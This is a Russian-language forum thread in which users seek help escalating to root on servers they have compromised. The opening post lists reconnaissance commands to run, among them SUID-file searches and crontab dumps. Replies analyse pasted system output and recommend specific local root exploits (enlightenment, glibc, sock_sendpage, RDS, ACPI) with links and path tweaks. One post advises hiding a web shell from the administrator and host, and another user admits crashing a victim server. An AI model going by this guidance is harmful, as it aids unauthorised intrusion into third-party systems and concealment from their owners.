Эта тема создана для вопросов связанных с повышением привилегий (рутинг, компиляция сплоитов, помощь в поиске сплоитов) на взломанных машинах.

Первая часть темы тут.

Мануал новичкам: Рутанье

Сплоиты можно найти тут и тут

Связка сплоитов enlightenment запускается так:

ПОСТЫ ОФОРМЛЕННЫЕ ОТЛИЧНО ОТ ПРАВИЛ ПЕРВОГО ПОСТА, УДАЛЯЮТСЯ! пруф

Внимание!

Если в выводе команды uname -a, вы наблюдаете нечто похожее: Linux ****** 2.*.**-NX

Это сервер принадлежит компании SpaceWeb (sweb.ru), и порутать его (сервер) практически невозможно! Так что все посты в котором фигурирует эти сервера (сервера SpaceWeb) УДАЛЯЮТСЯ!

Тоже самое касается серверов компанийДжино (www.jino.ru), Мастерхост (masterhost.ru) и 1gb (1gb.ru). пруф

Сообщение с вопросом должно содержать информацию из вывода следующих команд:

• uname -a
  
• ls -la /boot
  
• lls -la --full-time /lib (или /lib64)
  
• mount
  
• df -h
  
• cat /etc/issue
  
• cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
  
• cat /proc/version
  
• cat /proc/sys/vm/mmap_min_addr
  
• pwd
  
• ls -la /usr/bin/staprun
  
• find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.

Пример сообщения:

Оффтоп, флейм и тупые вопросы не приветствуются и удаляются, рецидивисты получают статус "рид-онли", однако грамотная помощь задающим вопросы поощряется.

FreeBSD 8.0

Есть проблема!

сервер :

FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010

Я залил эксплоит и сделал все как тут:

http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29

Затем меня выкинуло, и теперь не подключается неткат, пишет :

__________________________________________________ ________________________________

/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry

__________________________________________________ ________________________________

и не выкидывает.....

в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)

как можно выполнить на сервере команду еще?

попал в ступор... не пойму куда дальше двигаться...

sh-3.2$ uname -a

Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin

ux

sh-3.2$ ls -la /boot

total 15720

drwxr-xr-x 4 root root 1024 Feb 26 2009 .

drwxr-xr-x 21 root root 4096 Feb 26 2009 ..

-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686

-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686

drwxr-xr-x 2 root root 1024 Feb 26 2009 grub

-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686

drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found

-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686

sh-3.2$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7

.so

lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.

6 -> libc-2.7.so

lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s

o.2 -> libcap.so.2.11

-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s

o.2.11

lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont

.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont

.so.0.0.0

-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-

2.7.so

lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.

so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e

rr.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e

rr.so.2.1

lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso

le.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso

le.so.0.0.0

-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt

-2.7.so

lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt

.so.1 -> libcrypt-2.7.so

lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti

ls.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti

ls.so.0.0.0

sh-3.2$ mount

/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)

proc on /proc type proc (rw,noexec,nosuid,nodev)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

procbususb on /proc/bus/usb type usbfs (rw)

udev on /dev type tmpfs (rw,mode=0755)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)

/dev/cciss/c0d0p1 on /boot type ext2 (rw)

sh-3.2$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/cciss/c0d0p3 72G 6.1G 63G 9% /

tmpfs 1.8G 0 1.8G 0% /lib/init/rw

udev 10M 80K 10M 1% /dev

tmpfs 1.8G 0 1.8G 0% /dev/shm

/dev/cciss/c0d0p1 89M 16M 68M 19% /boot

sh-3.2$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.monthly )

#

sh-3.2$ cat /proc/version

Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.

1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009

попробуй это :

https://rdot.org/forum/showthread.php?t=817

rootxcl:

Все сплоиты из enlightenment'a используют NULL-pointer.

Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.

rootxcl

Скинь результат выполнения команды cat /proc/sys/vm/mmap_min_addr 2>&1

Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))

Ты делал все с двух ТЕРМИНАЛОВ, как написано в сплоите или побрезговал и попытался все сделать с шелла?

Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601

Пролистай тему, там выложено две модификации.

не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...

Ну админ, поймёт что что-то не так, как минимум из-за того что у него команды в консоле тоже не будут выполнятся...как и у любого другого пользователя! Думаю ответ на вопрос о другом варианте отпал ? пока не исправят последствия твоих действий...консоль не заработает! Так что единственное что ты можешь сделать, это постараться спрятать шелл так, что бы его не нашли...т.к. если не админ, так его хостер 100% буду проверять сервак на наличии шелов.

Народ сможет кто помочь с этим:

пробовал: enlightenment и сплоиты 2.6.18-ветки, компилятора на сервире нет или не доступен...

winstrool, не рутается.

есть сервак:

__________________________________________________ __________________________

__________________________________________________ __________________________

uname -a

Linux 2.6.9-89.0.9.ELsmp #1 SMP Mon Aug 24 01:51:10 EDT 2009 i686

__________________________________________________ __________________________

ls -la /boot

total 26163

drwxr-xr-x 5 root root 3072 Aug 26 2009 .

drwxr-xr-x 23 root root 4096 Oct 2 08:46 ..

-rw-r--r-- 1 root root 750652 Jan 30 2007 System.map-2.6.9-42.0.8.EL

-rw-r--r-- 1 root root 767450 Jan 30 2007 System.map-2.6.9-42.0.8.ELsmp

-rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL

-rw-r--r-- 1 root root 766260 Aug 12 2006 System.map-2.6.9-42.ELsmp

-rw-r--r-- 1 root root 760532 May 8 2008 System.map-2.6.9-67.0.15.EL

-rw-r--r-- 1 root root 780162 Jan 14 2009 System.map-2.6.9-78.0.13.EL

-rw-r--r-- 1 root root 797154 Jan 14 2009 System.map-2.6.9-78.0.13.ELsmp

-rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL

-rw-r--r-- 1 root root 785498 Aug 24 2009 System.map-2.6.9-89.0.9.ELsmp

-rw-r--r-- 1 root root 50337 Jan 30 2007 config-2.6.9-42.0.8.EL

-rw-r--r-- 1 root root 49930 Jan 30 2007 config-2.6.9-42.0.8.ELsmp

-rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL

-rw-r--r-- 1 root root 49926 Aug 12 2006 config-2.6.9-42.ELsmp

-rw-r--r-- 1 root root 50925 May 8 2008 config-2.6.9-67.0.15.EL

-rw-r--r-- 1 root root 51502 Jan 14 2009 config-2.6.9-78.0.13.EL

-rw-r--r-- 1 root root 51127 Jan 14 2009 config-2.6.9-78.0.13.ELsmp

-rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL

-rw-r--r-- 1 root root 51238 Aug 24 2009 config-2.6.9-89.0.9.ELsmp

drwxr-xr-x 2 root root 1024 Aug 26 2009 extlinux

drwxr-xr-x 2 root root 1024 Aug 26 2009 grub

-rw-r--r-- 1 root root 505489 Feb 9 2007 initrd-2.6.9-42.0.8.EL.img

-rw-r--r-- 1 root root 495995 Feb 9 2007 initrd-2.6.9-42.0.8.ELsmp.img

-rw-r--r-- 1 root root 505219 Feb 9 2007 initrd-2.6.9-42.EL.img

-rw-r--r-- 1 root root 495765 Feb 9 2007 initrd-2.6.9-42.ELsmp.img

-rw-r--r-- 1 root root 528439 Jun 5 2008 initrd-2.6.9-67.0.15.EL.img

-rw-r--r-- 1 root root 721334 Mar 3 2009 initrd-2.6.9-78.0.13.EL.img

-rw-r--r-- 1 root root 710086 Mar 3 2009 initrd-2.6.9-78.0.13.ELsmp.img

-rw-r--r-- 1 root root 722546 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img

-rw-r--r-- 1 root root 710930 Aug 26 2009 initrd-2.6.9-89.0.9.ELsmp.img

drwx------ 2 root root 12288 Feb 9 2007 lost+found

-rw-r--r-- 1 root root 9371 Aug 12 2006 message

-rw-r--r-- 1 root root 9371 Aug 12 2006 message.ja

-rw-r--r-- 1 root root 64329 May 8 2008 symvers-2.6.9-67.0.15.EL.gz

-rw-r--r-- 1 root root 66235 Jan 14 2009 symvers-2.6.9-78.0.13.EL.gz

-rw-r--r-- 1 root root 67032 Jan 14 2009 symvers-2.6.9-78.0.13.ELsmp.gz

-rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz

-rw-r--r-- 1 root root 68382 Aug 24 2009 symvers-2.6.9-89.0.9.ELsmp.gz

-rw-r--r-- 1 root root 1504589 Jan 30 2007 vmlinuz-2.6.9-42.0.8.EL

-rw-r--r-- 1 root root 1444726 Jan 30 2007 vmlinuz-2.6.9-42.0.8.ELsmp

-rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL

-rw-r--r-- 1 root root 1444405 Aug 12 2006 vmlinuz-2.6.9-42.ELsmp

-rw-r--r-- 1 root root 1519376 May 8 2008 vmlinuz-2.6.9-67.0.15.EL

-rw-r--r-- 1 root root 1545561 Jan 14 2009 vmlinuz-2.6.9-78.0.13.EL

-rw-r--r-- 1 root root 1483646 Jan 14 2009 vmlinuz-2.6.9-78.0.13.ELsmp

-rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL

-rw-r--r-- 1 root root 1472450 Aug 24 2009 vmlinuz-2.6.9-89.0.9.ELsmp

__________________________________________________ __________________________

$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1530808 2009-06-01 09:13:15.000000000 -0400 /lib/libc-2.3.4.so

lrwxrwxrwx 1 root root 13 2009-08-26 11:25:42.000000000 -0400 /lib/libc.so.6 -> libc-2.3.4.so

lrwxrwxrwx 1 root root 11 2008-06-05 12:40:20.000000000 -0400 /lib/libcap.so -> libcap.so.1

lrwxrwxrwx 1 root root 14 2007-02-09 18:55:46.000000000 -0500 /lib/libcap.so.1 -> libcap.so.1.10

-rwxr-xr-x 1 root root 11776 2005-02-21 15:08:41.000000000 -0500 /lib/libcap.so.1.10

-rwxr-xr-x 1 root root 192392 2009-06-01 09:13:15.000000000 -0400 /lib/libcidn-2.3.4.so

lrwxrwxrwx 1 root root 16 2009-08-26 11:25:42.000000000 -0400 /lib/libcidn.so.1 -> libcidn-2.3.4.so

lrwxrwxrwx 1 root root 17 2009-08-26 11:25:55.000000000 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root 7004 2009-06-01 13:09:40.000000000 -0400 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 41956 2009-06-01 09:13:15.000000000 -0400 /lib/libcrypt-2.3.4.so

lrwxrwxrwx 1 root root 17 2009-08-26 11:25:42.000000000 -0400 /lib/libcrypt.so.1 -> libcrypt-2.3.4.so

-rwxr-xr-x 1 root root 945120 2009-01-15 09:05:29.000000000 -0500 /lib/libcrypto.so.0.9.7a

lrwxrwxrwx 1 root root 19 2007-02-09 18:56:23.000000000 -0500 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a

__________________________________________________ __________________________

$ mount

/dev/sda2 on / type ext3 (rw,noatime,nodiratime)

none on /proc type proc (rw)

none on /sys type sysfs (rw)

none on /dev/pts type devpts (rw,gid=5,mode=620)

usbfs on /proc/bus/usb type usbfs (rw)

/dev/sda1 on /boot type ext3 (rw)

none on /dev/shm type tmpfs (rw)

/dev/sda5 on /tmp type ext3 (rw,noexec,nosuid)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

__________________________________________________ __________________________

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda2 142G 71G 70G 51% /

/dev/sda1 99M 32M 62M 34% /boot

none 2.0G 0 2.0G 0% /dev/shm

/dev/sda5 981M 18M 914M 2% /tmp

__________________________________________________ __________________________

$ cat /etc/issue

CentOS release 4.8 (Final)

Kernel \r on an \m

__________________________________________________ __________________________

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# run-parts

01 * * * * root run-parts /etc/cron.hourly

02 4 * * * root run-parts /etc/cron.daily

22 4 * * 0 root run-parts /etc/cron.weekly

42 4 1 * * root run-parts /etc/cron.monthly

*/45 * * * * root /usr/local/bin/php /usr/home/sites/aaaaaa.??????.com/xxxxxx.php

__________________________________________________ __________________________

$ cat /proc/version

Linux version 2.6.9-89.0.9.ELsmp (mockbuild@builder10.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-11)) #1 SMP Mon Aug 24 01:51:10 EDT 2009

__________________________________________________ __________________________

$ pwd

/home/??????/sites/www.??????.com/

__________________________________________________ __________________________

__________________________________________________ __________________________

Пробовал enlightenment, два из эксплоитов весят сервак: первый раз - в ребут, второй раз уснул часа на 1,5...

Glibc тоже не подходит...

много че пробовал, но чую : истина где-то рядом))

Windows NT HKWS01 5.2 build 3790

что можно попробовать?

Нужно помощ 2.6.32-46.1.BHsmp #1 SMP Tue Sep 6 12:18:02

Подробности:

uname -a

Linux 2.6.32-46.1.BHsmp #1 SMP Tue Sep 6 12:18:02 MDT 2011 x86_64 x86_64 x86_64 GNU/Linux

------------------------

ls -la /boot

total 71184 drwxr-xr-x 7 root root 4096 Sep 12 18:17 . drwxr-xr-x 50 root root 4096 Oct 6 09:05 .. -rw-r--r-- 1 root root 175 Oct 26 2010 .vmlinuz-2.6.18-194.17.4.el5.centos.plus.hmac -rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac -rw-r--r-- 1 root root 1244350 Oct 26 2010 System.map-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 1242340 Apr 2 2010 System.map-2.6.18-194.el5 -rw-r--r-- 1 root root 1490357 Sep 24 2010 System.map-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 1488922 Oct 22 2010 System.map-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 2157150 Nov 26 2010 System.map-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 2158628 Feb 23 2011 System.map-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 2158400 Jun 12 20:39 System.map-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 2169134 Jun 28 17:22 System.map-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 2167809 Sep 6 12:33 System.map-2.6.32-46.1.BHsmp -rw-r--r-- 1 root root 70165 Oct 26 2010 config-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 66887 Apr 2 2010 config-2.6.18-194.el5 -rw-r--r-- 1 root root 76997 Sep 24 2010 config-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 77018 Oct 22 2010 config-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 94885 Nov 26 2010 config-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 94833 Feb 23 2011 config-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 94865 Jun 12 20:39 config-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 94962 Jun 28 17:22 config-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 94986 Sep 6 12:33 config-2.6.32-46.1.BHsmp drwxr-xr-x 2 root root 4096 Apr 22 02:10 extlinux drwxr-xr-x 2 root root 4096 Sep 26 17:20 grub -rw------- 1 root root 2696144 Nov 4 2010 initrd-2.6.18-194.17.4.el5.centos.plus.img -rw------- 1 root root 2652439 Oct 13 2010 initrd-2.6.18-194.el5.img -rw------- 1 root root 2576907 Nov 4 2010 initrd-2.6.28-10.46.intel.IGB.BHsmp.img -rw------- 1 root root 2584714 Nov 5 2010 initrd-2.6.28-10.48.intel.IGB.BHsmp.img -rw------- 1 root root 3023760 Feb 4 2011 initrd-2.6.32-26.1.BHsmp.img -rw------- 1 root root 3040328 Mar 2 2011 initrd-2.6.32-29.1.BHsmp.img -rw------- 1 root root 3047216 Jun 12 20:39 initrd-2.6.32-39.1.BHsmp.img -rw------- 1 root root 3048932 Jul 1 13:05 initrd-2.6.32-42.1.BHsmp.img -rw------- 1 root root 3048934 Jul 1 11:01 initrd-2.6.32-42.1.BHsmp.img.old -rw------- 1 root root 3146429 Sep 26 17:20 initrd-2.6.32-46.1.BHsmp.img drwxr-xr-x 9 root root 4096 Jul 1 10:58 initrd29 drwxr-xr-x 9 root root 4096 Jul 1 11:25 initrd39 drwxr-xr-x 9 root root 4096 Jul 1 11:12 initrd42 -rw-r--r-- 1 root root 80032 Mar 16 2009 message -rw-r--r-- 1 root root 120758 Oct 26 2010 symvers-2.6.18-194.17.4.el5.centos.plus.gz -rw-r--r-- 1 root root 112656 Apr 2 2010 symvers-2.6.18-194.el5.gz -rw-r--r-- 1 root root 1955356 Oct 26 2010 vmlinuz-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 1953660 Apr 2 2010 vmlinuz-2.6.18-194.el5 -rw-r--r-- 1 root root 2417776 Sep 24 2010 vmlinuz-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 2413040 Oct 22 2010 vmlinuz-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 3522368 Nov 26 2010 vmlinuz-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 3522880 Feb 23 2011 vmlinuz-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 3522592 Jun 12 20:39 vmlinuz-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 3532672 Jun 28 17:22 vmlinuz-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 3531104 Sep 6 12:33 vmlinuz-2.6.32-46.1.BHsmp

------------------------------------

ls -la --full-time /lib/libc*

-rwxr-xr-x 2 root root 1693812 2011-08-12 11:48:50.000000000 -0600 /lib/libc-2.5.so lrwxrwxrwx 2 root root 11 2011-09-14 01:50:04.000000000 -0600 /lib/libc.so.6 -> libc-2.5.so lrwxrwxrwx 2 root root 11 2011-06-12 19:34:21.000000000 -0600 /lib/libcap.so -> libcap.so.1 lrwxrwxrwx 2 root root 14 2011-06-12 19:34:21.000000000 -0600 /lib/libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 2 root root 11560 2007-03-14 12:15:10.000000000 -0600 /lib/libcap.so.1.10 -rwxr-xr-x 2 root root 191708 2011-08-12 11:48:50.000000000 -0600 /lib/libcidn-2.5.so lrwxrwxrwx 2 root root 14 2011-09-14 01:50:04.000000000 -0600 /lib/libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 2 root root 17 2011-09-14 01:50:05.000000000 -0600 /lib/libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 2 root root 7812 2011-07-21 23:04:15.000000000 -0600 /lib/libcom_err.so.2.1 -rwxr-xr-x 2 root root 45432 2011-08-12 11:48:50.000000000 -0600 /lib/libcrypt-2.5.so lrwxrwxrwx 2 root root 15 2011-09-14 01:50:04.000000000 -0600 /lib/libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 2 root root 1156324 2010-03-25 06:12:53.000000000 -0600 /lib/libcrypto.so.0.9.7a -rwxr-xr-x 2 root root 1297124 2011-08-13 19:43:56.000000000 -0600 /lib/libcrypto.so.0.9.8e lrwxrwxrwx 2 root root 19 2011-06-12 19:34:21.000000000 -0600 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a lrwxrwxrwx 2 root root 19 2011-09-14 01:50:06.000000000 -0600 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e

---------------------------------

mount

/dev/sda1 on / type ext3 (rw,noatime,nodiratime,data=writeback,commit=30) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sdd1 on /home1 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdc1 on /home2 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdf1 on /home3 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sde1 on /home4 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdh1 on /home5 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdg1 on /home6 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdj1 on /home7 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdi1 on /home8 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sda2 on /var type ext3 (rw,noatime,nodiratime,data=writeback,commit=30) /dev/sdb16 on /var/lib/mysql type ext3 (rw,noexec,nosuid,noatime,nodiratime,data=writebac k,commit=30) none on /var/tmp type tmpfs (rw,noexec,nosuid,noatime,nodiratime,size=3g,size= 8253160k) tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,size=8253160k) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /ramdisk on /ramdisk._ type none (rw,bind) tmpfs on /ramdisk type tmpfs (rw,size=8253160k) /dev/ram15 on /var/ramlog type ext2 (rw) cpuset on /cgroups_cpuset type cgroup (rw,cpuset) cpuctl on /cgroups_cpuctl type cgroup (rw,cpu) /dev/sdp on /backup1 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdq on /backup2 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdk on /backup3 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdl on /backup4 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdm on /backup5 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdo on /backup6 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdr on /backup7 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdn on /backup8 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) blockio on /cgroups_blockio type cgroup (rw,blockio) /ramdisk/home on /home type none (ro,nosuid,bind,noatime,nodiratime)

-----------------------------

df -h

Filesystem Size Used Avail Use% Mounted on /dev/sda1 65G 14G 48G 22% / /dev/sdd1 917G 50G 820G 6% /home1 /dev/sdc1 917G 53G 818G 7% /home2 /dev/sdf1 917G 197G 674G 23% /home3 /dev/sde1 917G 53G 818G 6% /home4 /dev/sdh1 917G 94G 777G 11% /home5 /dev/sdg1 917G 64G 806G 8% /home6 /dev/sdj1 917G 60G 811G 7% /home7 /dev/sdi1 917G 60G 811G 7% /home8 /dev/sda2 65G 15G 47G 24% /var /dev/sdb16 99G 12G 82G 13% /var/lib/mysql none 7.9G 191M 7.7G 3% /var/tmp tmpfs 7.9G 0 7.9G 0% /dev/shm tmpfs 7.9G 97M 7.8G 2% /ramdisk /dev/ram15 248M 6.8M 229M 3% /var/ramlog /dev/sdp 2.0T 66G 1.9T 4% /backup1 /dev/sdq 2.0T 55G 1.9T 3% /backup2 /dev/sdk 2.0T 201G 1.8T 11% /backup3 /dev/sdl 2.0T 56G 1.9T 3% /backup4 /dev/sdm 2.0T 99G 1.9T 6% /backup5 /dev/sdo 2.0T 67G 1.9T 4% /backup6 /dev/sdr 2.0T 63G 1.9T 4% /backup7 /dev/sdn 2.0T 65G 1.9T 4% /backup8

--------------------

cat /proc/version

Linux version 2.6.32-46.1.BHsmp (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Tue Sep 6 12:18:02 MDT 2011

Sidarovich1975

Glibc через либу libc-*.so (https://rdot.org/forum/showpost.php?p=8233&postcount=1) тебе подойдет.

Только вместо каталога /tmp используй /home/??????/sites/www.??????.com/, т.к. /tmp у тебя смонтирован в другой раздел, а вот как раз /home (судя по выводу команды mount) у тебя отдельно не смонтирован. Т.е. тебе надо заменить по той ссылке что я дал выше все пути с /tmp на /home/... (до той директорию где будут права на write)

Можешь еще попробовать sock_sendpage3 (http://www.exploit-db.com/exploits/9641/), ну и enlightenment туда же. Но все же лучше сначала попробуй Glibc.

ekoglobul

Нет. Сентябрь 2011г, Глибц свежий.

не проходит ниччего:

Glibc я пробовал из

/var/tmp/

ну сейчас попробовал по совету

/home/??????/sites/www.??????.com/

вывод тот же (пишет, что неправильно указал атрибуты ping)

и сплоит этот тоже пробовал

пишет:

socket: Address family not supported by protokol

socket: Address family not supported by protokol

socket: Address family not supported by protokol

socket: Address family not supported by protokol

socket: Socket type not supported

socket: Address family not supported by protokol

по поводу enlightenment я писал :

больше не хочу - спалюсь...

www.1337day.com/exploits/17022

И будет тебе счастье

Sidarovich1975

1. Вместо ping, можно использовать любой суидник. Попробуй ping6

2. Ты после того, как получил ошибку о неправильных параметрах ping, проверил вывод id? Потому что в ошибке ping'a ничего удивительного нет =)

3. Попробуй другие версии sendpage:

sock_sendpage2: http://www.exploit-db.com/exploits/9598/ - вот второй к примеру.

4. А ты не помнишь какой сплоит из энглимента положил сервак? pipe?

Хм... Впервые вижу этот сплоит...

Помогите порутать сервак, пожалуйста.

ZARO

Думаю, что только если RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c

Отпишись потом взялось или нет, если нет, то что вывелось хотя бы.

UPD:

Хотя, судя по дате сборки ядра, оно скорее всего запатчено...

Еще можешь попробовать ACPI: http://www.exploit-db.com/exploits/15774/ но тут я хз.

Сомневаюсь конечно, но какие у тебя права на /var/server_monitor и на /var/server_monitor/summary.daily.php

sh-3.1$ gcc 1.c -o 2nd

1.c: In function 'prep_sock':

1.c:53: error: 'PF_RDS' undeclared (first use in this function)

1.c:53: error: (Each undeclared identifier is reported only once

1.c:53: error: for each function it appears in.)

Это выдает когда компилю http://www.vsecurity.com/download/tools/linux-rds-exploit.c

А второй сплоит не берет

